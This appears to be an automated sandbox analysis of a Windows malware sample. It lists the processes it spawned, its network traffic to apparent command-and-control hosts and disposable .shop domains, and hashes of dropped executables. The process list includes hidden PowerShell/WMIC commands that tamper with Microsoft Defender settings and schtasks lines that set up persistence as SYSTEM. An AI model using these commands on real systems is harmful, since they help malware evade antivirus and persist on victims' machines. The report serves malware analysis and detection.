"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1880,16089594077116985658,4366073024503587701,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\npYJPK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "qrBXK1"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 428 -ip 428

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 428 -s 968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5944 -ip 5944

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5944 -s 2248

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\TnOYFwC.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "ucrVpivlTlXwlAC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\qYCnzTh.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\eVyQqBQ.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\BORoGng.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\RxRgHWh.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "xmLyd1" /SC once /ST 10:30:13 /F /RU "Admin" /TR "\"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe\" --restore-last-session"

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "xmLyd1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb733d46f8,0x7ffb733d4708,0x7ffb733d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,11947548843731971930,2842992833005919128,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2244 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,11947548843731971930,2842992833005919128,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,11947548843731971930,2842992833005919128,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,11947548843731971930,2842992833005919128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3108 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,11947548843731971930,2842992833005919128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,11947548843731971930,2842992833005919128,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3744 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,11947548843731971930,2842992833005919128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4592 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,11947548843731971930,2842992833005919128,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4172 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,11947548843731971930,2842992833005919128,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4124 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,11947548843731971930,2842992833005919128,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5592 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,11947548843731971930,2842992833005919128,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5592 /prefetch:8

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "xmLyd1"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5208 -ip 5208

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 2104

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe

C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe

C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 149.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
RU 147.45.47.155:80 147.45.47.155 tcp
RU 147.45.47.70:80 147.45.47.70 tcp
US 8.8.8.8:53 70.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 155.47.45.147.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
RU 147.45.47.70:80 147.45.47.70 tcp
RU 185.215.113.67:40960 tcp
DE 185.172.128.33:8970 tcp
US 8.8.8.8:53 67.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 33.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 roomabolishsnifftwk.shop udp
US 172.67.146.92:443 roomabolishsnifftwk.shop tcp
US 8.8.8.8:53 museumtespaceorsp.shop udp
US 172.67.184.107:443 museumtespaceorsp.shop tcp
US 8.8.8.8:53 92.146.67.172.in-addr.arpa udp
US 8.8.8.8:53 107.184.67.172.in-addr.arpa udp
US 8.8.8.8:53 buttockdecarderwiso.shop udp
US 188.114.97.2:443 buttockdecarderwiso.shop tcp
US 8.8.8.8:53 detailbaconroollyws.shop udp
US 172.67.193.11:443 detailbaconroollyws.shop tcp
US 8.8.8.8:53 averageaattractiionsl.shop udp
US 104.21.62.60:443 averageaattractiionsl.shop tcp
US 8.8.8.8:53 horsedwollfedrwos.shop udp
US 8.8.8.8:53 11.193.67.172.in-addr.arpa udp
US 8.8.8.8:53 2.97.114.188.in-addr.arpa udp
US 104.21.74.118:443 horsedwollfedrwos.shop tcp
RU 5.42.65.67:48396 tcp
US 8.8.8.8:53 femininiespywageg.shop udp
US 172.67.141.63:443 femininiespywageg.shop tcp
US 8.8.8.8:53 patternapplauderw.shop udp
US 104.21.55.248:443 patternapplauderw.shop tcp
US 8.8.8.8:53 employhabragaomlsp.shop udp
US 8.8.8.8:53 60.62.21.104.in-addr.arpa udp
US 8.8.8.8:53 118.74.21.104.in-addr.arpa udp
US 8.8.8.8:53 67.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 63.141.67.172.in-addr.arpa udp
US 8.8.8.8:53 248.55.21.104.in-addr.arpa udp
US 172.67.203.218:443 employhabragaomlsp.shop tcp
US 8.8.8.8:53 understanndtytonyguw.shop udp
DE 23.88.106.134:80 23.88.106.134 tcp
US 172.67.203.201:443 understanndtytonyguw.shop tcp
US 8.8.8.8:53 stalfbaclcalorieeis.shop udp
US 172.67.131.36:443 stalfbaclcalorieeis.shop tcp
US 8.8.8.8:53 considerrycurrentyws.shop udp
US 104.21.28.32:443 considerrycurrentyws.shop tcp
US 8.8.8.8:53 218.203.67.172.in-addr.arpa udp
US 8.8.8.8:53 134.106.88.23.in-addr.arpa udp
US 8.8.8.8:53 201.203.67.172.in-addr.arpa udp
US 8.8.8.8:53 36.131.67.172.in-addr.arpa udp
US 8.8.8.8:53 civilianurinedtsraov.shop udp
US 104.21.49.245:443 civilianurinedtsraov.shop tcp
US 8.8.8.8:53 messtimetabledkolvk.shop udp
US 172.67.158.30:443 messtimetabledkolvk.shop tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 32.28.21.104.in-addr.arpa udp
US 8.8.8.8:53 deprivedrinkyfaiir.shop udp
US 172.67.134.244:443 deprivedrinkyfaiir.shop tcp
US 8.8.8.8:53 relaxtionflouwerwi.shop udp
US 8.8.8.8:53 245.49.21.104.in-addr.arpa udp
US 8.8.8.8:53 30.158.67.172.in-addr.arpa udp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 244.134.67.172.in-addr.arpa udp
US 188.114.96.2:443 relaxtionflouwerwi.shop tcp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 2.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.169.89:443 yip.su tcp
DE 185.172.128.82:80 185.172.128.82 tcp
US 8.8.8.8:53 gigapub.ma udp
RU 5.42.66.47:80 5.42.66.47 tcp
US 8.8.8.8:53 free.360totalsecurity.com udp
RU 5.42.66.47:80 5.42.66.47 tcp
FR 51.75.247.100:443 gigapub.ma tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 89.169.67.172.in-addr.arpa udp
US 8.8.8.8:53 82.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 47.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 100.247.75.51.in-addr.arpa udp
NL 151.236.127.172:443 free.360totalsecurity.com tcp
US 8.8.8.8:53 172.127.236.151.in-addr.arpa udp
US 8.8.8.8:53 st.p.360safe.com udp
US 8.8.8.8:53 iup.360safe.com udp
US 8.8.8.8:53 s.360safe.com udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tr.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
IE 54.77.42.29:3478 st.p.360safe.com udp
DE 52.29.179.141:80 s.360safe.com tcp
DE 52.29.179.141:80 s.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
NL 151.236.127.172:80 iup.360safe.com tcp
IE 54.76.174.118:80 tr.p.360safe.com udp
NL 151.236.127.172:80 iup.360safe.com tcp
US 8.8.8.8:53 29.42.77.54.in-addr.arpa udp
US 8.8.8.8:53 118.174.76.54.in-addr.arpa udp
US 8.8.8.8:53 iili.io udp
US 104.21.235.69:443 iili.io tcp
DE 52.29.179.141:80 s.360safe.com tcp
US 8.8.8.8:53 int.down.360safe.com udp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 104.192.108.21:80 int.down.360safe.com tcp
US 8.8.8.8:53 141.179.29.52.in-addr.arpa udp
US 8.8.8.8:53 69.235.21.104.in-addr.arpa udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 8.8.8.8:53 sd.p.360safe.com udp
US 8.8.8.8:53 17.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 21.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 20.108.192.104.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
DE 18.66.188.109:80 sd.p.360safe.com tcp
US 8.8.8.8:53 109.188.66.18.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
RU 5.42.66.10:80 5.42.66.10 tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 iplogger.com udp
US 8.8.8.8:53 pepecasas123.net udp
US 172.67.188.178:443 iplogger.com tcp
DE 195.10.205.90:4608 pepecasas123.net tcp
US 8.8.8.8:53 10.66.42.5.in-addr.arpa udp
US 8.8.8.8:53 163.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 8.8.8.8:53 178.188.67.172.in-addr.arpa udp
US 8.8.8.8:53 90.205.10.195.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 pepecasas123.net udp
DE 195.10.205.90:4608 pepecasas123.net tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
N/A 127.0.0.1:55392 tcp
N/A 127.0.0.1:55413 tcp
N/A 127.0.0.1:55416 tcp
N/A 127.0.0.1:55418 tcp
MD 94.103.188.126:80 94.103.188.126 tcp
US 8.8.8.8:53 126.188.103.94.in-addr.arpa udp
US 8.8.8.8:53 iplogger.com udp
US 104.21.76.57:443 iplogger.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 57.76.21.104.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 196.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
US 104.192.108.17:80 int.down.360safe.com tcp
GB 142.250.187.238:443 ogs.google.com tcp
GB 142.250.200.14:443 apis.google.com tcp
US 8.8.8.8:53 ssl.gstatic.com udp
GB 172.217.169.3:443 ssl.gstatic.com tcp
US 8.8.8.8:53 195.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 3.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 99.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 238.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 2.180.250.142.in-addr.arpa udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 8.8.8.8:53 iili.io udp
US 104.21.235.70:443 iili.io tcp
US 8.8.8.8:53 70.235.21.104.in-addr.arpa udp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 160.144.22.2.in-addr.arpa udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 8.8.8.8:53 service-domain.xyz udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 250.117.210.54.in-addr.arpa udp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 10.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 106.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
GB 172.217.16.225:443 clients2.googleusercontent.com tcp
GB 142.250.187.238:443 clients2.google.com tcp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 api4.check-data.xyz udp
US 44.235.180.78:80 api4.check-data.xyz tcp
US 8.8.8.8:53 78.180.235.44.in-addr.arpa udp
US 104.192.108.20:80 int.down.360safe.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 api2.check-data.xyz udp
US 8.8.8.8:53 www.rapidfilestorage.com udp
US 44.237.26.169:443 api2.check-data.xyz tcp
KZ 185.22.66.15:80 www.rapidfilestorage.com tcp
KZ 185.22.66.15:80 www.rapidfilestorage.com tcp
GB 142.250.187.196:443 www.google.com udp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 202.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 169.26.237.44.in-addr.arpa udp
US 8.8.8.8:53 15.66.22.185.in-addr.arpa udp
US 8.8.8.8:53 ssl.gstatic.com udp
US 8.8.8.8:53 play.google.com udp
GB 172.217.169.3:443 ssl.gstatic.com tcp
GB 142.250.179.238:443 play.google.com tcp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 rfiles4.tracemonitors.com udp
US 8.8.8.8:53 rfiles3.tracemonitors.com udp
RU 80.78.240.92:443 rfiles3.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles3.tracemonitors.com tcp
US 8.8.8.8:53 clients87.google.com udp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 114.192.66.18.in-addr.arpa udp
US 8.8.8.8:53 92.240.78.80.in-addr.arpa udp
US 8.8.8.8:53 2.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 update.googleapis.com udp
GB 142.250.187.195:443 update.googleapis.com tcp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 54.210.117.250:443 service-domain.xyz tcp
US 8.8.8.8:53 10.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.187.196:443 www.google.com tcp
US 8.8.8.8:53 api5.check-data.xyz udp
US 8.8.8.8:53 www.rapidfilestorage.com udp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 234.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 ssl.gstatic.com udp
US 44.235.180.78:443 api5.check-data.xyz tcp
GB 142.250.187.196:443 www.google.com udp
GB 172.217.169.3:443 ssl.gstatic.com tcp
US 8.8.8.8:53 play.google.com udp
KZ 185.22.66.15:80 www.rapidfilestorage.com tcp
GB 142.250.179.238:443 play.google.com tcp
US 44.235.180.78:443 api5.check-data.xyz tcp
KZ 185.22.66.15:80 www.rapidfilestorage.com tcp
GB 142.250.179.238:443 play.google.com udp
US 8.8.8.8:53 rfiles4.tracemonitors.com udp
US 8.8.8.8:53 rfiles5.tracemonitors.com udp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
RU 80.78.240.92:443 rfiles5.tracemonitors.com tcp
US 8.8.8.8:53 226.212.58.216.in-addr.arpa udp
US 8.8.8.8:53 clients61.google.com udp
RU 45.142.122.192:47398 tcp
RU 80.78.240.92:80 rfiles5.tracemonitors.com tcp
US 8.8.8.8:53 update.googleapis.com udp
GB 142.250.187.195:443 update.googleapis.com tcp
US 8.8.8.8:53 192.122.142.45.in-addr.arpa udp
US 104.192.108.17:80 int.down.360safe.com tcp
US 104.192.108.20:80 int.down.360safe.com tcp
US 104.192.108.17:80 int.down.360safe.com tcp

Files

memory/3084-0-0x0000000000C50000-0x00000000010FF000-memory.dmp

memory/3084-1-0x00000000770A4000-0x00000000770A6000-memory.dmp

memory/3084-2-0x0000000000C51000-0x0000000000C7F000-memory.dmp

memory/3084-3-0x0000000000C50000-0x00000000010FF000-memory.dmp

memory/3084-5-0x0000000000C50000-0x00000000010FF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

MD5 9f2f8eab49790c654dd41d04c422d704
SHA1 7cb5fccb7d0acc30a9c2fb79ba8187efbdd75248
SHA256 ed1a118567f1e5200fc0b4171cb873ec43be8ea212b25e87224769955336aedd
SHA512 f45157f7235a467c3ca4384a12a33dc388b5b1f7ead02db306d530db8719b0b1d9d57c8bab3b4ceb53d500079513f95b148ed175940f6a1173575d3c9b4f4096

memory/3084-17-0x0000000000C50000-0x00000000010FF000-memory.dmp

memory/1728-18-0x0000000000700000-0x0000000000BAF000-memory.dmp

memory/1728-20-0x0000000000700000-0x0000000000BAF000-memory.dmp

memory/1728-19-0x0000000000701000-0x000000000072F000-memory.dmp

memory/1728-21-0x0000000000700000-0x0000000000BAF000-memory.dmp

C:\Users\Admin\1000004002\689e56283d.exe

MD5 aad80fb7f941706d746a888b39d3cbf0
SHA1 779e6f1ce7d5039134a50962ff3b95e0f964b9ed
SHA256 49c435b1d5b2ba9c879fd4e90f8f4e2619c2b7d4d616480d48f75fe6dd91f867
SHA512 cf07b0962bd1c8bce6145a9584267bd7e78e42c80bb7c9047ca015c7d58ffcbb9e1787d5577e10abb4416f22559ff3edbd008fca39ac69f3bc45cfe1dac43b02

memory/4860-39-0x0000000000A30000-0x0000000000EE5000-memory.dmp

memory/1104-53-0x0000000000750000-0x0000000000C05000-memory.dmp

memory/4860-52-0x0000000000A30000-0x0000000000EE5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000005001\7a60b7df08.exe

MD5 5bfc5a36afa0a133dfdcc449dbf7560f
SHA1 66b393e0cb284f2a48d5fad88f8d85b5783f481f
SHA256 c158d60182aa0ead1722044052a65a418eca06fe00908eb64db9d3b42c4937cd
SHA512 f94b427f1b9429ee56b393a1edf553aa70c71b24f4974f410c883f9f5a6b7d61d1911ff798baaff872077b9e99d110f73ad1bb476d0f7e656aa72eb121f2fff7

memory/1728-72-0x0000000000700000-0x0000000000BAF000-memory.dmp

memory/4864-73-0x0000000000CC0000-0x00000000012A3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe

MD5 208bd37e8ead92ed1b933239fb3c7079
SHA1 941191eed14fce000cfedbae9acfcb8761eb3492
SHA256 e1fd277ffc74d67554adce94366e6fa5ebc81f8c4999634bcc3396164ba38494
SHA512 a9c3c32573a16b7ca71a12af6e8c8e88502b66bae2465a82dd921fbc6e0c833b9b1c2d436963df189dd9d68568e1be9128826a2e59f1d5fe066b637d2d866715

memory/1724-89-0x00000000009A0000-0x00000000009A1000-memory.dmp

memory/1724-91-0x00000000009A0000-0x00000000009A1000-memory.dmp

memory/4804-90-0x0000000000400000-0x0000000000592000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe

MD5 84bf36993bdd61d216e83fe391fcc7fd
SHA1 e023212e847a54328aaea05fbe41eb4828855ce6
SHA256 8e6d8b5a004c8f21bee1bbe4213c6d78cf80e439b38f587e963e9bb4569aaffa
SHA512 bb3241949618ad2d39057e085e150f43b4d41d74efc4658d9c27f8c0ec80420191517a2c0b6b7e225c4e50e02cd031cdfd178e05b9a869847a3c27b210d09caf

memory/4880-112-0x0000000000530000-0x0000000000582000-memory.dmp

C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe

MD5 15a7cae61788e4718d3c33abb7be6436
SHA1 62dac3a5d50c93c51f2ab4a5ebf78837dc7d3a9f
SHA256 bed71147aa297d95d2e2c67352fc06f7f631af3b7871ea148638ae66fc41e200
SHA512 5b3e3028523e95452be169bdfb966cd03ea5dbe34b7b98cf7482ca91b8317a0f4de224751d5a530ec23e72cbd6cc8e414d2d3726fefee9c30feab69dc348fa45

C:\Users\Admin\AppData\Roaming\configurationValue\One.exe

MD5 816df4ac8c796b73a28159a0b17369b6
SHA1 db8bbb6f73fab9875de4aaa489c03665d2611558
SHA256 7843255bc50ddda8c651f51347313daf07e53a745d39cc61d708c6e7d79b3647
SHA512 7dd155346acf611ffaf6399408f6409146fd724d7d382c7e143e3921e3d109563c314a0367a378b0965e427470f36bf6d70e1586d695a266f34aebd789965285

memory/4880-129-0x0000000004E70000-0x0000000004F02000-memory.dmp

memory/4880-127-0x0000000005340000-0x00000000058E4000-memory.dmp

memory/3988-135-0x0000000000680000-0x00000000006D2000-memory.dmp

